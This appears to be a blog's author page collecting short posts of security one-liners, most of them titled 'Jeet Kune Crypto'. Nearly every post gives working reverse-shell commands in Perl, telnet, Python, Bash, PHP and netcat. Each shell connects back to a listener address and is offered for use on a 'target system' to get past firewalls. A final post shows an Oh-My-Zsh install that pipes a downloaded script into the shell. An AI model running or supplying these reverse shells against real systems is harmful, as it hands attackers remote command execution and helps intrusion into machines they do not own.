About mootiny

Network and Systems Engineer F/OSS Contributor and Maintainer Gray Hat Freelancing Atlanta, GA +1.770.715.9153
If you would not be forgotten, as soon as you are dead and rotten, either write things worth reading or do the things worth writing.

Jeet Kune Crypto: Powerful Perl Reverse Shells

Let’s spawn a few perl reverse shells, in various environments. Why? Because Perl is that diverse.

 

Perl Reverse Shells

 

If you’re just getting into writing code, python comes heavily recommended. But, if code auditing is something you’re wanting to get into, jumping straight into perl might be more beneficial. And, yes, these are all built to be executed on a single line.

 

A linux reverse shell using /bin/sh

 

perl -e 'use Socket; $i="172.16.16.5"; $p=1234; socket(S,PF_INET, SOCK_STREAM, getprotobyname("tcp")); if(connect(S,sockaddr_in($p,inet_aton($i)))){ open(STDIN,">&S");open(STDOUT,">&S"); open(STDERR, ">&S"); exec("/bin/sh -i");};'

 

perl reverse shell connecting back to ncat
perl reverse shell connecting back
ncat listening for the perl reverse shell to connect
ncat listening and accepting

 

A Windows reverse shell using Perl

 

It’s actually not uncommon to find perl installed on Windows Servers

 

perl -MIO -e '$c=new IO::Socket::INET(PeerAddr, "172.16.16.5:1234");STDIN->fdopen($c,r);$~->fdopen($c,w);$_ while<>;'

 

Perl reverse shell without using /bin/sh

 

Perl is so versatile that we can do some amazing things with it. Watch us spawn a reverse shell without using a binary!

 

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr, "172.16.16.5:1234");STDIN->fdopen($c,r);$~->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

 

Feel free to comment, if you’ve got some more reverse shells. We do have moderation enabled, but we’re pretty lenient with the content here, at Gray Hat Freelancing.

2020-07-24T10:52:59-04:00April 6th, 2020|Categories: Jeet Kune Crypto, One Liners|Tags: , , |

Jeet Kune Crypto: Telnet Reverse Shells are Devastating

Reverse shells communicate in plaintext, by default. Telnet isn’t often installed by default any more. But, if it does exist on your target system, here are two one liners you can use to spawn a reverse shell with telnet.

Telnet Reverse Shells are Easy

rm -rf /tmp/p; mknod /tmp/p p && telnet 172.16.16.1 1234 0/tmp/p
telnet reverse shells
ugh… telnet

Another Simple Telnet Connect-Back Shell

telnet 172.16.16.1 1234 | /bin/bash | telnet 172.16.16.1 1235

As usual, in these reverse shell scenarios, your IP is 172.16.16.1 and your port is 1234. Telnet should be piped through an encrypted tunnel, unless you don’t mind people snooping on you.

2020-07-13T17:39:58-04:00April 6th, 2020|Categories: Jeet Kune Crypto, One Liners|Tags: , |

More One Line Reverse Shells

Jeet Kune Crypto: One Line Reverse Shells with Scripting Languages

Reverse shells are extremely useful for subverting firewalls or other security mechanisms that may block new opened ports. Often you’ll find hosts already have several scripting languages installed. We’re going to take advantage of the some of the most popular of those languages, to spawn a reverse shell.

In these scenarios, your listening IP is 172.16.16.1 and your listening port is 1234.

Python Reverse Shell:

This python one line reverse shell is kind of a trip. Trust me, nobody expects you to remember this one, off of the top of your head.

python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("172.16.16.1",1234)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'

BASH Reverse Shell:

This one is simple. Everyone expects you to remember something like this, off of the top of your head.

bash -i >& /dev/tcp/172.16.16.1/1234 0>&1

PHP Reverse Shell:

From terminal:

php -r '$sock=fsockopen("172.16.16.1",1234);exec("/bin/sh" -i <&3 >&3 2>&3");'

 

2020-07-13T17:31:40-04:00April 6th, 2020|Categories: Jeet Kune Crypto, One Liners|Tags: |

Jeet Kune Crypto

Kung Foo: Jeet Kune Crypto

Jeet Kun Crypto isn’t a real thing, just a term I’m applying a new section of one-liners that are strictly security related. In that sense, I mean to say they’re penetration test, or at least vulnerability discovery related. It’s a joke. A play on an old tendency to refer to skillfully written and security related code as “kung foo”.

2020-06-19T12:26:31-04:00April 5th, 2020|Categories: Errata|

Jeet Kune Crypto: netcat (reverse shells)

Jeet Kune Crypto: netcat (reverse shells)

One of the most useful TCP/IP tools, for network and systems engineers, is netcat. Netcat is commonly referred to as the “TCP/IP Swiss Army Knife”. It is often flagged as malware or a “potentially unwanted program” by anti-malware software.

While traditional backdoors wait for you to connect (which netcat can also do). Here are a few ways that you can use it as a “reverse shell”, or a backdoor that connects back to you:

Versions that support "-e":
Linux:
nc -e "/bin/sh" <target> <target port>
Windows:
nc -e "cmd.exe" <target> <target port>

If the version of netcat that you’re using does not support “-e”, you’ll want to create a network socket out of a file. You can “hack” up a network socket on linux, like so:

mkfifo /tmp/socket;cat /tmp/socket|/bin/sh -i 2>&1|nc <target> <target port> > /tmp/socket

If you’re using netcat to listen for the incoming connection, you’d prepare to receive this type of connection like so:

nc <host> <port>
or for a range of ports
nc <host> <starting port>-<ending port>
2020-06-19T12:24:43-04:00April 5th, 2020|Categories: Jeet Kune Crypto, One Liners|Tags: , |

Oh-My-ZSH!

Oh-My-Zsh!

oh-my-zsh terminal screenshot
Oh-My-ZSH!

Oh My Zsh is a delightful, open source, community-driven framework for managing your Zsh configuration. It comes bundled with thousands of helpful functions, helpers, plugins, themes, and a few things that make you shout…

sh -c "$(curl -fsSL https://raw.github.com/ohmyzsh/ohmyzsh/master/tools/install.sh)"

2020-06-19T12:21:29-04:00April 4th, 2020|Categories: One Liners|Tags: , |
Go to Top